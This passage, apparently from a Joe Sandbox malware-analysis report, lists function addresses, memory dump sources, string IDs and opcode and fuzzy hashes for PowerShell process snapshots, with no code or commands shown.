                                                                                                                                  • Instruction ID: a3fd2a26e587d1b8fb31ff02cf00d68040bf2bc62fda61e3ccdad4b3e093cded
                                                                                                                                  • Opcode Fuzzy Hash: 9e0a7c02b36d3385e088d54cee43589306346ec18c730cebac797bf3707a279f
                                                                                                                                  • Instruction Fuzzy Hash: D0A00236B141254FBF4CDE39865F53B273757C5705309C46E92C3D0444CF3540819548

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 07532568 Relevance: 13.0, Strings: 10, Instructions: 459COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $c|j$4'^q$4'^q$4'^q$4'^q$piQj$tP^q$tP^q$$^q$$^q
                                                                                                                                  • API String ID: 0-611318191
                                                                                                                                  • Opcode ID: 4903d2e722982ab70653914b6fc6fd0c7b8f66d6ade33f80e120bce615793ef5
                                                                                                                                  • Instruction ID: 956c22ec87b2a0128431cbdcef913ac2e8a98a3f2161839443f73a6d0fed95db
                                                                                                                                  • Opcode Fuzzy Hash: 4903d2e722982ab70653914b6fc6fd0c7b8f66d6ade33f80e120bce615793ef5
                                                                                                                                  • Instruction Fuzzy Hash: 1DE14CB1B047468FCB259B6998046EAFBE6BFC5210F1884ABD455CF225DF31C885C7E2
                                                                                                                                  Function 075341F0 Relevance: 10.3, Strings: 8, Instructions: 318COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                  • API String ID: 0-3865595929
                                                                                                                                  • Opcode ID: a83b05d1a0b326f49325ec829d0b174b724f6882fed2a5f828bbd1584759aeb5
                                                                                                                                  • Instruction ID: f8f28ced0f250e9ae5ba85c721e71c0f85e31238f604f9f53ca8498fa2955407
                                                                                                                                  • Opcode Fuzzy Hash: a83b05d1a0b326f49325ec829d0b174b724f6882fed2a5f828bbd1584759aeb5
                                                                                                                                  • Instruction Fuzzy Hash: 94A15CB17043858FD7249A699800ABABFE6BFC6650F14847BE445CF362DE36CC85C361
                                                                                                                                  Function 075300F0 Relevance: 6.4, Strings: 5, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                  • API String ID: 0-3272787073
                                                                                                                                  • Opcode ID: 46fd9893f56078bb604d15d3ff3b130273b9b00f01d61c62aa39e69de7d473d3
                                                                                                                                  • Instruction ID: cd12dd9315356691b2d82cca866b48d17513d99e03c0678bcc74a2830d5e727f
                                                                                                                                  • Opcode Fuzzy Hash: 46fd9893f56078bb604d15d3ff3b130273b9b00f01d61c62aa39e69de7d473d3
                                                                                                                                  • Instruction Fuzzy Hash: 9E512DB57043459FCB254AA9D8009EBBBE7BFC6210F14847BD45DCB3A1DA32C845C7A1
                                                                                                                                  Function 03177CC8 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: `_q$`_q$`_q$`_q
                                                                                                                                  • API String ID: 0-3297199963
                                                                                                                                  • Opcode ID: daab62822fb4e2b14bd601c28e661f2d6b6d9d377651f76a1fe6a012cbcb66fb
                                                                                                                                  • Instruction ID: 9d7ddbcb3079b6485859bdf064e11175ba8d3b3bfe5f0d4c0c360886a2df305b
                                                                                                                                  • Opcode Fuzzy Hash: daab62822fb4e2b14bd601c28e661f2d6b6d9d377651f76a1fe6a012cbcb66fb
                                                                                                                                  • Instruction Fuzzy Hash: A9B1B774E002099FCB55DFA9D990A9EFBF2FF88300F148629E419AB355DB34A945CF90
                                                                                                                                  Function 03177CD8 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: `_q$`_q$`_q$`_q
                                                                                                                                  • API String ID: 0-3297199963
                                                                                                                                  • Opcode ID: 3dedd20f3f4894435c17e907d6e0cc7cd3c0dfb17054cfdb673d986da8eca077
                                                                                                                                  • Instruction ID: 79f0b4803528b98ab769b450df0c4fc287606d3f75878d0109c02f3d6732c7cc
                                                                                                                                  • Opcode Fuzzy Hash: 3dedd20f3f4894435c17e907d6e0cc7cd3c0dfb17054cfdb673d986da8eca077
                                                                                                                                  • Instruction Fuzzy Hash: 0CB1B874E002099FDB54DFA9D990A9EFBF2FF88300F148629E419AB355DB34A945CF90
                                                                                                                                  Function 07536050 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                  • Opcode ID: 066ebd4fa92768495bc6433d3da1588126205e46c7a42feefd1915ec9570b8b1
                                                                                                                                  • Instruction ID: a29a39e64a31702f1d017a9cbc979a3676bd0fde5b2b9fabdbde5f5401bed563
                                                                                                                                  • Opcode Fuzzy Hash: 066ebd4fa92768495bc6433d3da1588126205e46c7a42feefd1915ec9570b8b1
                                                                                                                                  • Instruction Fuzzy Hash: A32137B1710206ABDB28566A5801BAAABDAFBC1710F24882FA505CF3A6DD76D8458361
                                                                                                                                  Function 075307A8 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                  • API String ID: 0-2049395529
                                                                                                                                  • Opcode ID: 82dcb1d595df7454e6e7baa1e863fe98b6ba2b609a51147c324e336a23451bf8
                                                                                                                                  • Instruction ID: d898a8bc9c90a9185cacf2cc048315a3121e256e6373b96cb4ee3290eb085bb6
                                                                                                                                  • Opcode Fuzzy Hash: 82dcb1d595df7454e6e7baa1e863fe98b6ba2b609a51147c324e336a23451bf8
                                                                                                                                  • Instruction Fuzzy Hash: 7701F9A1B093855FD72B162828205A57FF7AFC365471944DBD045CF2A7CD298C4A83A2

                                                                                                                                  Executed Functions

                                                                                                                                  Function 07960CAD Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                  • API String ID: 0-3272787073
                                                                                                                                  • Opcode ID: 5d98985893eeb8cb7e6585af907c3478d634dcb1b6a0b10f5084123a797622a6
                                                                                                                                  • Instruction ID: c0f5c3548b494474df6735447038dbbd24be0c64b8556d67808f2dae9e3f0c34
                                                                                                                                  • Opcode Fuzzy Hash: 5d98985893eeb8cb7e6585af907c3478d634dcb1b6a0b10f5084123a797622a6
                                                                                                                                  • Instruction Fuzzy Hash: 56413EF5B0030A8FCB291A7C98A8B7E7795AF81218F148E3AC515CF295DF7AD844C351
                                                                                                                                  Function 079605E0 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                  • API String ID: 0-1420252700
                                                                                                                                  • Opcode ID: d4fcd7142db8198ab2499b77c89bdc8b263b311e6545c46ba75d40a7684317c3
                                                                                                                                  • Instruction ID: f27d5a0b088d517e9487be641ca29060c2b01c0f77112c9707c959cc947104b5
                                                                                                                                  • Opcode Fuzzy Hash: d4fcd7142db8198ab2499b77c89bdc8b263b311e6545c46ba75d40a7684317c3
                                                                                                                                  • Instruction Fuzzy Hash: AED12BB1B043058FCB15DB7C9598A6EBBE6EFC5214F1886ABD405CB352EB32C845C791
                                                                                                                                  Function 0796075C Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q
                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                  • Opcode ID: fed893d0bddb37e6634130d28498a92cb52ef6b7915bcc9b590b085ca47ce519
                                                                                                                                  • Instruction ID: 616822490d310ce6cff0da37338755dbb15f99b7f5e081a11cae1dd17e876079
                                                                                                                                  • Opcode Fuzzy Hash: fed893d0bddb37e6634130d28498a92cb52ef6b7915bcc9b590b085ca47ce519
                                                                                                                                  • Instruction Fuzzy Hash: EB21E7F0A05202CFDB10DF6CC588EBE7BA5EF81618F1946A6D505CB251E7768981CBD2
                                                                                                                                  Function 079605C3 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q
                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                  • Opcode ID: 0ca4638f573546c965943aa156cb7b55262b017efe6566e12719d81197419e3a
                                                                                                                                  • Instruction ID: 1f6f84e89e997e46be4ecb3017113b976584e506602b210450fc8f63740a4476
                                                                                                                                  • Opcode Fuzzy Hash: 0ca4638f573546c965943aa156cb7b55262b017efe6566e12719d81197419e3a
                                                                                                                                  • Instruction Fuzzy Hash: E12162F1F05702CFCB248F6DD588E5A7BB5AF85225F1987AAD4088B121E374D845CF91
                                                                                                                                  Function 07960770 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q
                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                  • Opcode ID: a9f33e6f33ba5f170d14f7293c268cf18ea7a7ae3be1f77a7dd78afcff1153d1
                                                                                                                                  • Instruction ID: 85415eeb760cdcf550e253d3b98db53926034698fb6d706b79eb21e841730bed
                                                                                                                                  • Opcode Fuzzy Hash: a9f33e6f33ba5f170d14f7293c268cf18ea7a7ae3be1f77a7dd78afcff1153d1
                                                                                                                                  • Instruction Fuzzy Hash: 1D11B2F0A00206CFDB64DF6DC588E3EB7E9EF85A18F14426AD50587250E776D981CBD1
                                                                                                                                  Function 04E22AB0 Relevance: .3, Instructions: 305COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3519960039.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_4e20000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8981c05f2accf0f2dd2a58c7fb8f1a3e482ba83c5c9600a484e276bb8d445d88
                                                                                                                                  • Instruction ID: 65fdaf71622afcf12c85f0564afc99fc191189274228fa8d4acb24e21fe03d23
                                                                                                                                  • Opcode Fuzzy Hash: 8981c05f2accf0f2dd2a58c7fb8f1a3e482ba83c5c9600a484e276bb8d445d88
                                                                                                                                  • Instruction Fuzzy Hash: A1C1DC74A002598FCB15CF98C5949AEFBB1FF48310B248699EA15AB3A5C735FC41CFA0
                                                                                                                                  Function 07960910 Relevance: .1, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 341d6442db0cf205de9e7e58025106842bc02eac754ebe31e49a1e8fb7e370a3
                                                                                                                                  • Instruction ID: 2a4ee67595c207b1ae4173dde1a6a3812cdb82579e7744216cc7bd0d0f572f3d
                                                                                                                                  • Opcode Fuzzy Hash: 341d6442db0cf205de9e7e58025106842bc02eac754ebe31e49a1e8fb7e370a3
                                                                                                                                  • Instruction Fuzzy Hash: 051160F0A00206CFDB54CB5DC188E6EF7F6AF89258F198669D408D7211E771D984CBA1
                                                                                                                                  Function 0319D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3519581895.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_319d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c6c305263d4dc589ca741ad4f32641cbc294de3a6ad9f93002d03cb80c69178
                                                                                                                                  • Instruction ID: 9bdaaaf7379ee8133608797cf89700d31a885a8923e96831b41916e99d3df732
                                                                                                                                  • Opcode Fuzzy Hash: 4c6c305263d4dc589ca741ad4f32641cbc294de3a6ad9f93002d03cb80c69178
                                                                                                                                  • Instruction Fuzzy Hash: 7901DF710093049BFB148A29ED84B67FF98EF49324F1DC56AEC084B246C7799881C6B2
                                                                                                                                  Function 0319D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3519581895.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_319d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2b650dbe708d8aa148d6325551b98805431dd97cd25b28bf28f460c58c4e3624
                                                                                                                                  • Instruction ID: fa2e9f2c256d5702c45705b284833bad08c6fe905cb282bd411f99b814522311
                                                                                                                                  • Opcode Fuzzy Hash: 2b650dbe708d8aa148d6325551b98805431dd97cd25b28bf28f460c58c4e3624
                                                                                                                                  • Instruction Fuzzy Hash: 4D011B6100E3C09FE7128B259894B52BFB4AF47224F1D80CBD8888F2A3C2699844C762

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 0796041B Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.3536289226.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7960000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                  • API String ID: 0-2049395529
                                                                                                                                  • Opcode ID: e472755667667f14ee9a0d1e665945c2ce58f77e04143266bd526e1f83977458
                                                                                                                                  • Instruction ID: 9e2d91952d1e5586044a05a92d3592ff7b1d50ca1e40d974a8de7b59ce015832
                                                                                                                                  • Opcode Fuzzy Hash: e472755667667f14ee9a0d1e665945c2ce58f77e04143266bd526e1f83977458
                                                                                                                                  • Instruction Fuzzy Hash: AC01A260B4D3C94FC72B166C28645666FF74F8365431A0ADFC081CF26BDD558C4983A3